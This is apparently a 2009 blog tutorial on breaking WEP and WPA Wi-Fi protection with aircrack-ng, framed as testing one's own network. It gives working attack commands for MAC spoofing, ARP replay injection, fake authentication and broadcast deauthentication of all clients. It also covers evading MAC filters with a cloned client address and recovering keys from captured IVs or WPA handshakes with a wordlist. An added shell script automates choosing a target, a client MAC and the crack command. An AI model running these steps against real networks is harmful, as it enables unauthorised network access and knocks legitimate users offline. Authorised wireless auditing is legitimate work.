Friday, March 20, 2009

Testing WEP and WPA protection

Aircrack-ng is one of the easiest software suites for testing how well a WEP- or WPA-protected wireless network actually stands up to attack. I have an HP Pavilion dv6500 laptop with an Intel PRO/Wireless 3945ABG [Golan] Network Connection wireless card. I'm using openSUSE 11.1 64-bit as the OS, with kernel 2.6.27.19-3.2-default.

Wireless card features
* Chipset: Intel WM3945AG
* IEEE Standards: 802.11a, 802.11b, 802.11g
* PCI ID: 8086:4227

Prerequisites
* gcc
* libopenssl-devel
* sqlite3-devel >=3.6.10
* iw
* http://trac.aircrack-ng.org/attachment/ticket/572/sha-compile-fix-64bit.patch

Installation
$ wget http://download.aircrack-ng.org/aircrack-ng-1.0-rc2.tar.gz
$ tar -zxvf aircrack-ng-1.0-rc2.tar.gz
$ cd aircrack-ng-1.0-rc2
Patch source file sha1-sse2.S using instructions in sha-compile-fix-64bit.patch
$ make SQLITE=true
$ sudo make SQLITE=true install

Using airmon-ng
Stop previously started monitoring:
$ sudo airmon-ng stop wlan0
$ sudo airmon-ng stop mon0

Change MAC of your wlan interface
$ sudo ifconfig wlan0 down
$ sudo macchanger -A wlan0
$ sudo ifconfig wlan0 up
$ ifconfig

Create additional wireless interface mon0 in monitor mode
$ sudo airmon-ng start wlan0
$ iwconfig

Change MAC of newly created interface
$ sudo ifconfig mon0 down
$ sudo macchanger -A mon0
$ sudo ifconfig mon0 up
$ ifconfig

From now on you'll be using the mon0 interface. Keep in mind that the MAC you pass to aireplay-ng with -h later must be the MAC mon0 actually has (check it with ifconfig): the card only acknowledges frames addressed to its own MAC, so fake authentication with a different -h address will fail.

Using airodump-ng
Find the wireless network you want to test with:
$ sudo airodump-ng mon0

and write down the target SSID (ESSID), the MAC address of the access point (BSSID), the channel number (CH) and the encryption type (ENC). When finished, press CTRL+C to exit.

Create directory for dumping information with:
$ cd ~/Documents
$ mkdir data
$ cd data

Run airodump-ng to capture packets from your access point into dumpfile-01.cap (airodump-ng appends a sequence number to the prefix given with -w, and also writes a dumpfile-01.csv summary of the APs and stations it saw). You should always specify a channel with airodump-ng, because otherwise it will hop through all channels, and that will break your injection attack.
$ sudo airodump-ng --channel [Access Point channel] --bssid [Access Point bssid] -w [dumpfile] [device]

After a few seconds in airodump-ng you should notice that there are clients connected to the access point. Connected clients are listed under "STATION" in the lower half of the screen.
Take note of the MAC address of one of the clients; you will use it in the next step. If no clients are connected, this can be your own faked MAC, but then the AP will only accept your injected frames after the fake authentication in attack 1 has succeeded.

Using aireplay attack 3 - ARP Injection
Open another terminal window and run the ARP replay attack. After some time an ARP request will come through, and the #/s figure in the airodump-ng window will increase. If the RXQ (receive quality %) column is >90 you should be getting a #/s of 200 or higher, but more importantly it should be much higher than it was before.
$ sudo aireplay-ng -3 -b [Access Point bssid] -h [client MAC addr. noted in previous step] [device]
-3 - is the number of the attack we're using. It listens for ARP requests and re-injects them over and over; the AP relays each one with a new IV, and those IVs are what aircrack-ng later uses to recover the WEP key. The attacks used in this post are numbered 0 to 3; aireplay-ng also offers others, such as chopchop (-4), fragmentation (-5) and an injection test (-9).

Using aireplay attack 1 - Fake Authentication Attack
Attacks 1 and 0 are usually used together. There are situations where attack 1 will not work (e.g. MAC filtering is on), but most of the time it works, and it's quick. If you're following along you should now have two terminal windows open, running airodump-ng and aireplay attack 3. If not, go back and follow the directions again. Note that if the -h address you gave attack 3 is your own (faked) MAC rather than that of a real client, the AP will discard the injected frames until this attack has associated you, so #/s will not rise before this step succeeds.
To initiate attack 1 type:
$ sudo aireplay-ng -1 0 -e [essid] -a [Access Point bssid] -h [your faked client MAC addr] [device]

-1 - is the number of the attack we're using. It is a fake authentication attack: it performs an open-system authentication and association with the AP so that the AP treats our MAC as a legitimate station and accepts the frames attack 3 injects.
0 - is the re-association timing in seconds. 0 means authenticate once and exit, which is usually enough; a non-zero value keeps re-authenticating, which helps if the AP drops you after a while.

You must have fairly good signal strength showing in airodump-ng for this to work. It needs to show over 40 in the PWR column, though your experience may differ greatly depending on the driver. If all goes well, when you press Enter you should see something like:
10:13:24 Sending authentication request (Open System)
10:13:24 Authentication successful
10:13:24 Sending Association Request
10:13:24 Association successful :-)

What just happened is that you became associated with the AP: it now treats your MAC as a legitimate station and will accept the frames attack 3 injects. The ARP requests that attack 3 is waiting for normally come from a real client, typically when it (re)connects, so if you look at the console running attack 3 it may already have started getting lots of data in the #Data and #/s columns. More often than not, though, you'll have to wait for the next step.

There can be many reasons why you won't be able to associate with the AP, meaning this attack failed. The AP may have MAC filtering on, which can sometimes be circumvented by using the MAC of a client that is already associated. You may not be close enough to the AP to associate. It can also be that the network uses WPA rather than WEP, in which case you cannot inject this way.

Using aireplay attack 0 - Deauthentication Attack
If your #Data count is flying up, you can skip this step. If not, or if you are trying to crack WPA, read on.
If you've followed along until now you should have a few windows open: one running airodump-ng, another running aireplay attack 3, and a third in which attack 1 ran and has returned to the prompt.

At the prompt type:
$ aireplay-ng -0 10 -e [essid] -a [Access Point bssid] [device]

-0 - is the attack number we're using. It is a deauthentication attack: aireplay-ng forges deauthentication frames in the AP's name (with -a alone they go to the broadcast address, so every client of that AP is hit), which forces the clients to reconnect. A reconnecting client typically sends an ARP request, which is what attack 3 is waiting for. Add -c [client MAC] to target a single station instead of all of them.
10 - is the number of deauthentication bursts to send. A single burst may not reach the client, so we send it several times, hence the 10; a value of 0 would mean keep sending until you stop it.

This attack is the one to use for WPA encryption: deauthenticating a client forces it to re-associate, and the 4-way handshake of that reconnection is what airodump-ng records. Watch the upper right part of the airodump-ng screen for "WPA handshake: [bssid]" to appear.

If all went well then attack 3 should have picked up an ARP request, and it should be injecting very, very quickly. Go to the window with airodump, and watch with delight as the #Data count flies up.

Using aireplay attack 2 - Interactive Packet Replay
If your #Data count is still not flying up, try this attack, in which we look for a large packet to replay:
$ sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [Access Point bssid] -h [client MAC addr. noted in previous step] [device]

-p 0841 sets the frame control field so that the replayed packet looks like a normal client frame headed to the AP (To-DS), and -c FF:FF:FF:FF:FF:FF rewrites the destination to the broadcast address, so the AP has to relay it with a fresh IV regardless of what the captured packet originally was.
When asked whether to use a packet, say yes:
Use this packet: y

Final step - aircrack-ng
For WEP encryption wait a few minutes until #Data reaches about 50 000. That is usually enough, but leave the attack running just in case, because a 104-bit key can need more IVs. Remember the difference: if you are cracking WEP you are waiting for more data, and if you are cracking WPA you are waiting for "WPA handshake: [bssid]" to appear in the upper right part of the airodump-ng screen when a client (re)connects to the access point. So for WEP you use aireplay attacks 3, 1 and 0 in that order (attack 3 can be started first, but it only injects once attack 1 has associated you, unless -h was a real client's MAC); for WPA only attack 0 matters, since ARP replay generates WEP IVs and does nothing for a handshake capture.

Once you have collected enough data or got a handshake you can disconnect and take the capture files somewhere else; aircrack-ng only reads files and needs neither the wireless card nor root. Open another terminal window and run aircrack-ng to start the key search. For WEP:
$ aircrack-ng -b [Access Point bssid] dumpfile*.cap

For WPA/WPA2 the handshake only lets you test passphrase candidates, so you need a wordlist:
$ aircrack-ng -w /path/to/password.lst -b [Access Point bssid] dumpfile*.cap

If you have precomputed PMKs for the target ESSID with airolib-ng (which is why the SQLite build option was enabled above), pass the database with -r masterdb instead of -w.

For WEP, aircrack-ng prints KEY FOUND! as soon as it has enough IVs, and it retries automatically as airodump-ng writes more. For WPA it succeeds only if the passphrase is actually in the wordlist.
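As an added example (not code from the original post or from the aircrack-ng project), here is a small POSIX shell script that reads the CSV airodump-ng writes alongside the capture (dumpfile-01.csv when -w dumpfile was used) and automates the two bookkeeping steps above: picking the BSSID, channel, encryption type and a client MAC for -h from the airodump-ng output, and then choosing the aircrack-ng invocation that matches the encryption type (WEP: statistical attack on the IVs; WPA/WPA2: wordlist against the handshake). The CSV embedded in it is a constructed sample in the airodump-ng 1.0 column layout, and the file names dumpfile-01.cap and password.lst are assumptions.

```shell
#!/bin/sh
# Added example: parse airodump-ng's CSV and pick the matching aircrack-ng
# command. Not part of aircrack-ng. Column layout follows the 1.0-rc2 CSV;
# an ESSID containing a comma would confuse this simple parser.

# Constructed sample of dumpfile-01.csv: one WEP AP, one WPA2 AP, three
# stations (one of them not associated with anything).
SAMPLE_CSV='
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2009-03-20 10:00:00, 2009-03-20 10:05:00,  6,  54, WEP , WEP, , -60,  120,  2100,   0.  0.  0.  0,   6, labwep, 
66:77:88:99:AA:BB, 2009-03-20 10:00:00, 2009-03-20 10:05:00, 11,  54, WPA2, CCMP, PSK, -72,   80,     0,   0.  0.  0.  0,   6, labwpa, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2009-03-20 10:00:00, 2009-03-20 10:05:00, -55,  300, 00:11:22:33:44:55, labwep
AA:BB:CC:DD:EE:02, 2009-03-20 10:00:00, 2009-03-20 10:05:00, -70,   40, 66:77:88:99:AA:BB, 
AA:BB:CC:DD:EE:03, 2009-03-20 10:00:00, 2009-03-20 10:05:00, -80,    5, (not associated), labwep,guest
'

# list_aps CSV -> one line per access point: BSSID CH PRIVACY ESSID
# The AP section ends where the "Station MAC" header begins.
list_aps() {
    printf '%s\n' "$1" | awk -F', *' '
        /^Station MAC/ { exit }
        /^[0-9A-F][0-9A-F]:/ { gsub(/ +$/, "", $6); print $1, $4, $6, $14 }'
}

# list_clients CSV BSSID -> MACs of stations seen associated with that AP
# (the station section carries the AP BSSID in its 6th column).
list_clients() {
    printf '%s\n' "$1" | awk -F', *' -v ap="$2" '
        /^Station MAC/ { in_stations = 1; next }
        in_stations && $6 == ap { print $1 }'
}

# ap_privacy CSV BSSID -> the ENC column for that AP (WEP, WPA, WPA2, OPN)
ap_privacy() {
    list_aps "$1" | awk -v ap="$2" '$1 == ap { print $3 }'
}

# inject_mac CSV BSSID FALLBACK -> MAC to pass to aireplay-ng -h: the first
# station seen talking to the AP, or FALLBACK (your own faked MAC) if none.
inject_mac() {
    mac=$(list_clients "$1" "$2" | head -n 1)
    [ -n "$mac" ] && printf '%s\n' "$mac" || printf '%s\n' "$3"
}

# crack_cmd PRIVACY BSSID CAPTURE WORDLIST -> the aircrack-ng command line.
# WEP needs captured IVs, not a wordlist; WPA/WPA2 needs the handshake in
# CAPTURE plus a wordlist. Open networks and unknown types are an error.
crack_cmd() {
    case "$1" in
        WEP)      printf 'aircrack-ng -b %s %s\n' "$2" "$3" ;;
        WPA|WPA2) printf 'aircrack-ng -w %s -b %s %s\n' "$4" "$2" "$3" ;;
        OPN)      echo "open network: nothing to crack" >&2; return 1 ;;
        *)        echo "unknown encryption type: $1" >&2; return 1 ;;
    esac
}

# Demo on the constructed sample: the WEP AP is the target.
TARGET=00:11:22:33:44:55
echo "Access points (BSSID CH ENC ESSID):"
list_aps "$SAMPLE_CSV"
echo "MAC to use with aireplay-ng -h: $(inject_mac "$SAMPLE_CSV" "$TARGET" 00:DE:AD:BE:EF:00)"
echo "Crack with: $(crack_cmd "$(ap_privacy "$SAMPLE_CSV" "$TARGET")" "$TARGET" dumpfile-01.cap password.lst)"
```

Run it as-is to see the output for the sample; to use it on a real capture, replace SAMPLE_CSV with `$(cat dumpfile-01.csv)`. The station list is also the place to look when fake authentication fails against a MAC-filtering AP: a MAC that airodump-ng shows as associated is one the filter already accepts.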

Resources
http://www.aircrack-ng.org/doku.php?id=tutorial
http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks
